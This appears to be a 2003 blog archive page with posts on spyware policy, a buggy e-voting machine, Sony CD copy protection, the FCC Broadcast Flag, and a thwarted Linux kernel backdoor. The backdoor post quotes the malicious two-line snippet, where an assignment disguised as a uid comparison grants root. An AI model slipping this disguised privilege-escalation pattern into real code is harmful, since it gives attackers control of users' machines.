March 29, 2024

Archives for November 2003

CDT Report on Spyware

The Center for Democracy and Technology has issued a sensible and accessible paper about the spyware problem and associated policy issues.

Spyware is software, installed on your computer without your consent, that gathers information about what you do on your computer. It’s shockingly common – if you are a typical active web surfer using Internet Explorer in its default configuration, and you haven’t been taking specific steps to protect yourself against spyware, then you probably have several spyware programs on your computer right now.

CDT recommends that end users protect themselves by using anti-spyware tools such as AdAware, Spybot Search and Destroy, Spyware Eliminator, or BPS Spyware/Adware Remover. (I have had good luck with Spybot Search and Destroy.)

At the policy level, CDT is lukewarm about attempts to ban spyware specifically, because of the difficult line-drawing exercise involved in distinguishing spyware from certain types of legitimate programs. They argue instead for policies that address the underlying problems: installation without consent, and surreptitious monitoring of user behavior.

Kudos to CDT for advancing the policy discussion on this often overlooked issue.

Flaky Voting Technology

Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine or will corrupt the machines’ software, to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.

This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports :

School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.

In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.

“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”

And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.

You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.

Linux Backdoor Attempt Thwarted

Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.

The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.

This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a badguy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source devleopers did read the code and spot the problem.

What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.

[Technogeek readers: The offending code is below. Can you spot the problem?

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]

New Sony CD-DRM Technology Upcoming

Reuters reports that a new CD copy-protection technology from Sony debuted yesterday in Germany, on a recording by the group Naturally Seven. Does anybody know how I can get a copy of this CD?

UPDATE (12:30 PM): Thanks to Joe Barillari and Scott Ananian for pointing me to amazon.de, where I ordered the CD. (At least I think I did; my German is pretty poor.)

Broadcast Flag Scorecard

Before the FCC issued its Broadcast Flag Order, I wrote a post on “Reading the Broadcast Flag Rules”, in which I recommended reading the eventual Order carefully since “the details can make a big difference.” I pointed to four specific choices the FCC had to make.

Let’s look at how the FCC chose. For each of the four issues I identified, I’ll quote in italics my previous posting, and then I’ll summarize the FCC’s action.

First, look at the criteria that an anti-copying technology must meet to be on the list of approved technologies. Must a technology give copyright owners control over all uses of content; or is a technology allowed [to] support legal uses such as time-shifting; or is it required to support such uses?

The Order says that technologies must prevent “indiscriminate redistribution”, but it isn’t precise about what that term means. The precise scope of permissible redistribution is deferred to a later rulemaking. There is also some language expressing a desire not to control copying within the home, but that desire may not be backed by formal requirement.

Verdict: This issue is still unresolved; perhaps the later rulemaking will clarify it.

Second, look at who decides which technologies can be on the approved list. Whoever makes this decision will control entry into the market for digital TV decoders. Is this up to the movie and TV industries; or does an administrative body like the FCC decide; or is each vendor responsible for determining whether their own technology meets the requirements?

This issue was deferred to a later rulemaking process, so we don’t know what the final answer will be. The FCC does appear to understand the danger inherent in letting the entertainment industry control the list.

The Order does establish an interim approval mechanism, in which the FCC makes the final decisions, after a streamlined filing and counter-filing process by the affected parties.

Verdict: This issue was deferred until later, but the FCC seems to be leaning in the right direction.

Third, see whether the regulatory process allows for the possibility that no suitable anti-copying technology exists. Will the mandate be delayed if no strong anti-copying technology exists; or do the rules require that some technology be certified by a certain date, even if none is up to par?

The Order doesn’t address this issue head-on. It does say that to qualify, a technology need only resist attacks by ordinary users using widely available tools. This decision, along with the lack of precision about the scope of home copying that will be allowed, makes it easier to find a compliant technology later.

Verdict: This issue was not specifically addressed; it may be clarified in the later rulemaking.

Finally, look at which types of devices are subject to design mandates. To be covered, must a device be primarily designed for decoding digital TV; or is it enough for it to be merely capable of doing so? Do the mandates apply broadly to “downstream devices”? And is something a “downstream device” based on what it is primarily designed to do, or on what it is merely capable of doing?

This last issue is the most important, since it defines how broadly the rule will interfere with technological progress. The worst-case scenario is an overbroad rule that ends up micro-managing the design of general-purpose technologies like personal computers and the Internet. I know the FCC means well, but I wish I could say I was 100% sure that they won’t make that mistake.

The Order regulates Digital TV demodulators, as well as Transport Stream Processors (which take the demodulated signal and separate it into its digital audio, video, and metadata components).

The impact on general-purpose computers is a bit hard to determine. It appears that if a computer contains a DTV receiver card, the communications between that card and the rest of the computer would be regulated. This would then impact the design of any applications or device drivers that handle the DTV stream coming from the card.

Verdict: The FCC seems to have been trying to limit the negative impact of the Order by limiting its scope, but some broad impacts seem to be inevitable side-effects of mandating any kind of Flag.

Bottom line: The FCC’s order will be harmful; but it could have been much, much worse.